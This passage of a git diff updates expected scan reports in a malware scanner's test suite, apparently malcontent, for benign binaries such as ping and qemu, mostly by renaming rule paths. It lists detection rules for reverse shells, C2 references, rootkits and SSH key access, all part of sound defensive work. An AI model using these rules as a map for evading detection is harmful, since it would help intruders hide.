| LOW | [anti-static/obfuscation/obfuscate](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/obfuscate.yara#obfuscate) | Mentions the word obfuscate | [obfuscatedFont](https://github.com/search?q=obfuscatedFont&type=code)
[obfuscates](https://github.com/search?q=obfuscates&type=code) |
@@ -89,8 +89,10 @@
| LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) |
| LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) |
| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) |
-| LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) |
-| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
+| LOW | [discover/system/cpu](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) |
+| LOW | [discover/system/dmesg](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/dmesg.yara#dmesg) | accesses the kernel log ring buffer | [dmesg](https://github.com/search?q=dmesg&type=code) |
+| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
| LOW | [discover/system/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) |
| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) |
| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
@@ -151,7 +153,6 @@
| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
| LOW | [process/namespace_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/namespace-set.yara#setns) | associate thread or process with a namespace | [setns](https://github.com/search?q=setns&type=code) |
-| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
| LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) |
| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md
index 9a3b9ab45..c5f8863cc 100644
--- a/tests/linux/clean/ping.x86_64.md
+++ b/tests/linux/clean/ping.x86_64.md
@@ -3,14 +3,14 @@
| RISK | KEY | DESCRIPTION | EVIDENCE |
|--------|--------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Port](https://github.com/search?q=Port&type=code) |
+| MEDIUM | [discover/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/multiple.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) |
| MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) |
-| MEDIUM | [discover/system/network](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/system_network.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
[ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code) |
| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) |
| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping -6 -N](https://github.com/search?q=ping+-6+-N&type=code)
[ping broadcast](https://github.com/search?q=ping+broadcast&type=code)
[ping does not fragment](https://github.com/search?q=ping+does+not+fragment&type=code)
[ping for user must be](https://github.com/search?q=ping+for+user+must+be&type=code)
[ping session](https://github.com/search?q=ping+session&type=code)
[ping statistics ---](https://github.com/search?q=ping+statistics+---&type=code) |
| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) |
| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code)
[inet_ntop](https://github.com/search?q=inet_ntop&type=code) |
| MEDIUM | [net/socket/raw](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/raw.yara#raw_sockets) | [send raw and/or malformed IP packets](https://man7.org/linux/man-pages/man7/raw.7.html) | [SOCK_RAW](https://github.com/search?q=SOCK_RAW&type=code)
[raw socket](https://github.com/search?q=raw+socket&type=code) |
-| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
+| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
| LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) |
| LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) |
| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) |
diff --git a/tests/linux/clean/pulumi.simple b/tests/linux/clean/pulumi.simple
index 26472bd5f..287705b9f 100644
--- a/tests/linux/clean/pulumi.simple
+++ b/tests/linux/clean/pulumi.simple
@@ -3,7 +3,7 @@
3P/threat_hunting/sharppack: medium
c2/addr/http_dynamic: medium
c2/addr/ip: medium
-c2/server_address: medium
+c2/addr/server: medium
c2/tool_transfer/download: medium
collect/archives/zip: medium
collect/databases/mysql: medium
@@ -38,15 +38,16 @@ discover/cloud/google_metadata: low
discover/cloud/google_storage: low
discover/group/lookup: medium
discover/network/mac_address: medium
+discover/process/parent: low
discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: medium
discover/system/sysinfo: medium
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
exec/cmd: medium
exec/conditional/LANG: low
exec/install_additional/pip_install: medium
@@ -141,7 +142,6 @@ persist/kernel_module/module: medium
persist/pid_file: medium
privesc/sudo: medium
process/chroot: low
-process/parent_pid_get: low
sus/exclamation: medium
sus/intercept: medium
sus/leetspeak: medium
diff --git a/tests/linux/clean/pypi_package_index.json.simple b/tests/linux/clean/pypi_package_index.json.simple
index 00f118f0f..cb5c63bb8 100644
--- a/tests/linux/clean/pypi_package_index.json.simple
+++ b/tests/linux/clean/pypi_package_index.json.simple
@@ -101,7 +101,7 @@ discover/network/interface_list: medium
discover/network/netstat: medium
discover/processes/list: medium
discover/processes/pgrep: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
discover/system/machine_id: low
discover/system/platform: low
discover/system/sysinfo: medium
@@ -111,6 +111,7 @@ evasion/bypass_security/linux/ufw: medium
evasion/logging/acct: low
evasion/process_injection/ptrace: medium
evasion/process_injection/readelf: medium
+evasion/rootkit/refs: medium
exec/dylib/symbol_address: medium
exec/install_additional/pip_install: high
exec/plugin: low
@@ -152,7 +153,6 @@ impact/remote_access/net_shell: high
impact/remote_access/reverse_shell: high
impact/remote_access/trojan: medium
impact/rootkit: low
-impact/rootkit/refs: medium
impact/ui/screen_capture: high
impact/ui/x11_auth: medium
lateral/scan/brute_force: low
diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md
index f7d0f95b6..94ebbe1ec 100644
--- a/tests/linux/clean/qemu-system-xtensa.md
+++ b/tests/linux/clean/qemu-system-xtensa.md
@@ -4,13 +4,13 @@
|--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| HIGH | [crypto/xor](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/xor.yara#xor_decode_encode) | decodes/encodes XOR content | [Opcode_xor_encode_fns](https://github.com/search?q=Opcode_xor_encode_fns&type=code) |
| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[add_port](https://github.com/search?q=add_port&type=code)
[ahci_port](https://github.com/search?q=ahci_port&type=code)
[and_port](https://github.com/search?q=and_port&type=code)
[be_port](https://github.com/search?q=be_port&type=code)
[claim_port](https://github.com/search?q=claim_port&type=code)
[clear_port](https://github.com/search?q=clear_port&type=code)
[compare_ip](https://github.com/search?q=compare_ip&type=code)
[ehci_port](https://github.com/search?q=ehci_port&type=code)
[extract_ip](https://github.com/search?q=extract_ip&type=code)
[find_port](https://github.com/search?q=find_port&type=code)
[fix_port](https://github.com/search?q=fix_port&type=code)
[get_ip](https://github.com/search?q=get_ip&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[handle_port](https://github.com/search?q=handle_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[hub_port](https://github.com/search?q=hub_port&type=code)
[megasas_port](https://github.com/search?q=megasas_port&type=code)
[mem_port](https://github.com/search?q=mem_port&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[metadata_ip](https://github.com/search?q=metadata_ip&type=code)
[mmio_port](https://github.com/search?q=mmio_port&type=code)
[mptsas_port](https://github.com/search?q=mptsas_port&type=code)
[ohci_port](https://github.com/search?q=ohci_port&type=code)
[pcie_port](https://github.com/search?q=pcie_port&type=code)
[register_port](https://github.com/search?q=register_port&type=code)
[release_port](https://github.com/search?q=release_port&type=code)
[remove_port](https://github.com/search?q=remove_port&type=code)
[reset_port](https://github.com/search?q=reset_port&type=code)
[serial_port](https://github.com/search?q=serial_port&type=code)
[spdm_port](https://github.com/search?q=spdm_port&type=code)
[state_port](https://github.com/search?q=state_port&type=code)
[throttle_port](https://github.com/search?q=throttle_port&type=code)
[uhci_port](https://github.com/search?q=uhci_port&type=code)
[update_ip](https://github.com/search?q=update_ip&type=code)
[upstream_port](https://github.com/search?q=upstream_port&type=code)
[usb_port](https://github.com/search?q=usb_port&type=code)
[virtser_port](https://github.com/search?q=virtser_port&type=code)
[write_port](https://github.com/search?q=write_port&type=code)
[xhci_port](https://github.com/search?q=xhci_port&type=code) |
+| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) |
| MEDIUM | [c2/refs](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/refs.yara#command_and_control) | Uses terms that may reference a command and control server | [c2_port](https://github.com/search?q=c2_port&type=code) |
-| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) |
| MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) |
-| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [/.ssh/config](https://github.com/search?q=%2F.ssh%2Fconfig&type=code) |
+| MEDIUM | [credential/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssh/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [~/.ssh/config](https://github.com/search?q=~%2F.ssh%2Fconfig&type=code) |
| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) |
| MEDIUM | [discover/network/mac_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/mac-address.yara#macaddr) | Retrieves network MAC address | [MAC address](https://github.com/search?q=MAC+address&type=code) |
-| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
+| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
| MEDIUM | [evasion/indicator_blocking/vm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/indicator_blocking/vm.yara#hidden_qemu) | operates a QEMU VM | [QEMU_VFIO](https://github.com/search?q=QEMU_VFIO&type=code)
[unable to find CPU model '%s'](https://github.com/search?q=unable+to+find+CPU+model+%27%25s%27&type=code) |
| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [qapi_free_MigrationExecCommand](https://github.com/search?q=qapi_free_MigrationExecCommand&type=code)
[visit_type_MigrationExecCommand_members](https://github.com/search?q=visit_type_MigrationExecCommand_members&type=code) |
| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execv](https://github.com/search?q=execv&type=code) |
@@ -29,7 +29,7 @@
| MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) |
| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) |
| MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) |
-| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Probe](https://github.com/search?q=Probe&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
+| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
| MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) |
| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) |
| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) |
@@ -58,6 +58,8 @@
| LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) |
| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) |
| LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) |
+| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
+| LOW | [discover/system/dmesg](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/dmesg.yara#dmesg) | accesses the kernel log ring buffer | [dmesg](https://github.com/search?q=dmesg&type=code) |
